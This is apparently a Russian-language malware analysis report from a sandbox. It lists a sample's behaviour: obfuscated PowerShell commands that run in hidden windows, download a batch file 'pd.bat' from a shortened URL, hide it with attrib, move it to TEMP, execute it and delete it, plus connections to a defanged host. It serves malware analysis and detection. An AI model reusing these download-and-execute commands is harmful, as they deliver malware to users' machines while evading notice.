Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w 1 stARt`-slE`Ep 3; Move-Item "pd.bat" -Destination "$e`nV:T`EMP"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w 1 stARt`-slE`Ep 7;cd "$e`nV:T`EMP; ./pd.bat"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').Invoke('https://cutt.ly/jhUMUGI','pd.bat')
Сетевая активность
TCP
- 'cu#t.ly':443
UDP
- DNS ASK cu#t.ly
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w 1 stARt`-slE`Ep 3; Move-Item "pd.bat" -Destination "$e`nV:T`EMP"' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w 1 stARt`-slE`Ep 7;cd "$e`nV:T`EMP; ./pd.bat"' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').Invoke('https://cutt.ly/jhUMUGI','pd.bat')' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\attrib.exe' +s +h pd.bat
